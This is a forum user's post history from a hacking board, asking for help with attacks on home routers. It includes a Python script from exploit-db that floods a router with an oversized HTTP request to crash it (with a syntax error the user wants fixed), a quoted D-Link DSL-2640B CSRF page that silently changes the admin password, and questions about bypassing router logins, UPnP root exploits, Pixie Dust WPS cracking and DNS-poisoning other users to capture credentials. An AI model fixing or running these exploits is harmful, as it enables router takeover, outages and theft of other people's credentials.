Messages - FurqanHanif

1
Hacking and Security / UPNP Exploit ?? Gain Root Access of Router ..
« on: December 02, 2015, 08:15:32 am »
Did they ever release this tool, which exploits UPnP and gets you root access to the router (0day exploit)? Does Metasploit include this module?
What modules can be used to gain root access to a router by exploiting the UPnP service (via Metasploit)?
www.youtube.com/watch?v=cv-MbL7KFKE

Does anyone know about it?

Any help, please?

2
General discussion / Re: Someone Help Me to Fix the Below Code
« on: May 03, 2015, 09:53:18 pm »
Now there is an error on line 15... :(

Quote
File "buffer.py", line 15
    payload += ("Host: %s \r\n\r\n", % host)
                                     ^
SyntaxError: invalid syntax

3
General discussion / Someone Help Me to Fix the Below Code
« on: May 03, 2015, 09:39:53 pm »
I am trying to run this exploit, but I'm getting a syntax error when I run it. Can someone help me fix this code?
I am getting a syntax error on line 14... :(

Code: (python)
#!/bin/python
import socket
import struct
 
# This will crash the router.
# In some devices it takes about 10 minutes until functionality is restored.
 
buffer = "\x41" * 6000            # Original fuzzing buffer.
host = "192.168.15.25"
 
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 80))
 
payload = GET /" + buffer + " HTTP / 1.1 \r\n "
payload += ("Host: %s \r\n\r\n", % host)
 
s.send(payload)
s.close()

Original Post.
https://www.exploit-db.com/exploits/34102/

4
Try attacking the 8-digit pin in the router. You can do this by using Reaver, it takes about ~ 4 - 10 hours.


This only works if WPS is not locked. You can see if it is open or not using wash (wash -i <monitor interface>)
I am talking about login, not Wi-Fi hacking... ???

5
Bruteforce
Brute force is not going to work if the password is #kjkjhuijko88287098JbJh#$%%# and you know it..
So......

6
I have a router, model I think 2009 or 10, using micro_httpd, so can its authentication be bypassed? Is it possible to retrieve the password as a hash and then crack it, or simply bypass its authentication?
I know about Xhydra and I have also used it, so please don't tell me about using that kind of password-cracking software...
Thanks in advance...

This is the full detail of my router..

7
Hacking and Security / D-Link DSL CSRF Exploit . How to Use/Test ??
« on: May 02, 2015, 11:20:53 pm »
Someone tell me how I use this exploit to test my router. There is only HTML code given; can someone explain to me how exactly I use this code to change the password... ???

Quote
+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : D-Link DSL-2640B (ADSL Router) CSRF Vulnerability
# Date          : 19-02-2012
# Author        : Ivano Binetti (http://ivanobinetti.com)
# Vendor site   : http://www.d-link.com
# Version       : DSL-2640B
# Tested on     : Firmware Version: EU_4.00; Hardware Version: B2
+--------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------[Change Admin Account Password by Ivano Binetti]--------------------------------------------------+
Summary
 
1)Introduction
2)Vulnerability Description
3)Exploit
 
+---------------------------------------------------------------------------------------------------------------------------------+
 
 
1)Introduction
 
D-Link DSL-2640B is an ADSL Router using (also) a web management interface.
 
 
2)Vulnerability Description
 
The D-Link DSL-2640B's web interface (listening on tcp/ip port 80) is prone to CSRF vulnerabilities which allows to change router
parameters and -among other things- to change default administrator("admin") password.
 
3)Exploit
 
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change ADMIN password</H2>
<form method="POST" name="form0" action="http://192.168.1.1:80/redpass.cgi?sysPassword=new_password&change=1">
</form>
</body>
</html>
 


https://www.exploit-db.com/exploits/18499/


8
Hacking and Security / Re: Question about MITM Attack.
« on: April 19, 2015, 04:12:01 pm »
Still unexplained: how do I implement the above example in the real world? I don't think only learning ARP spoofing solves this. :-\ And of course I'm going to use already-made tools, so no need for a Python explanation. :)

9
Hacking and Security / Re: Question about MITM Attack.
« on: April 19, 2015, 01:38:25 pm »
Thanks for your reply, but I don't have an Android for real... :(
And please read my post carefully... :)

10
Hacking and Security / Question about MITM Attack.
« on: April 19, 2015, 11:13:27 am »
I have a question about the MITM attack (or whatever this attack is called).
Let's say I am connected to a router and three more users are connected to it; the router address is 192.168.0.1. Now, I don't know the login credentials of the router, so I use Ettercap and some DNS poisoning etc. and attack user "A". Now whenever user "A" types www.google.com, it auto-redirects to the original router page, whose address is 192.168.0.1. The user then types their login user name and password (because the router page is not using HTTPS, it's easy to read the data in plaintext), and I am using Wireshark to read all traffic and filter all requests related to 192.168.0.1, and I get the user name and password.
So is this possible? If yes, then how do I do it? If no, then why?
Thanks in advance.. :)

12
Well, it looks like the Pixie Dust attack really exists...
A person posted a PoC (proof of concept) on the Kali forum in which he successfully recovered the correct WPS PIN via offline brute forcing of the PIN...
(For more info, visit)
https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)/page4&highlight=pixie+dust+attack

13
Has anyone heard about this Pixie Dust attack/exploit? Is there any tool available yet to do this attack? If not, does anyone know how to do it? I think it has something to do with M3, ES1, ES2, hash decrypt and then brute forcing the WPS PIN. So how exactly do you decrypt and brute force the PIN? :o (Please post if someone knows anything (tool etc.) regarding this attack.. :)

http://www.slideshare.net/0xcite/offline-bruteforce-attack-on-wifi-protected-setup

14
Hmm, right, I'll check.

15
But on some other post, it says that it's possible. (The same question was asked by some other person.) ???
See the last comments in the post..
http://null-byte.wonderhowto.com/how-to/hack-wi-fi-creating-evil-twin-wireless-access-point-eavesdrop-data-0147919/
